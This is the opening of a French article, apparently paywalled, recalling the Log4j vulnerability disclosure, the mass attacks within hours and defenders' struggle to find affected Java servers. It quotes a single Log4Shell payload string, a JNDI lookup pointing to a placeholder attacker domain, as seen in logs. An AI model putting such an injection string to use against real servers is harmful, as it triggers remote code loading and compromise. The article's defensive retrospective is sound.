Nous nous souviendrons tous un moment de ce vendredi après-midi quand les premières annonces sur log4j sont arrivées et que nous avons tous vu dans nos logs se multiplier les “${jndi:ldap://mechanthacker.com/a}” en l’espace de quelques minutes. Pour beaucoup d’entre nous, le week-end a été long, une course contre la montre pour éviter de se retrouver avec un système d’information ressemblant à un champ de ruines le lundi matin, ou tout aussi probablement une ferme de minage de cryptomonnaies. Une caractéristique particulière de cette faille a certainement été le niveau de massification des attaques en l’espace de quelques heures. Tout serveur accessible sur les ports 80 et 443, même non référencé par les moteurs de recherche s’est retrouvé attaqué depuis des adresses IP multiples dès vendredi après-midi. Il est probable que certains groupes de pirates disposent d’ores et déjà d’une grande quantité de serveurs compromis qu’ils pourront monétiser dans un second temps, par exemple avec des campagnes de ransomware.
Du côté défensif, il a fallu en urgence essayer d’identifier tous les serveurs s’appuyant sur la bibliothèque incriminée ce qui est loin d’être simple… Car s’il est relativement simple de lister sur un parc tous les serveurs sur lesquels un logiciel a été déployé, il en est tout autrement lorsqu’il s’agit d’une bibliothèque Java pouvant être intégrée...
- Accédez à tous les contenus de Connect en illimité
- Découvrez des listes de lecture et des contenus Premium
- Consultez les nouveaux articles en avant-première
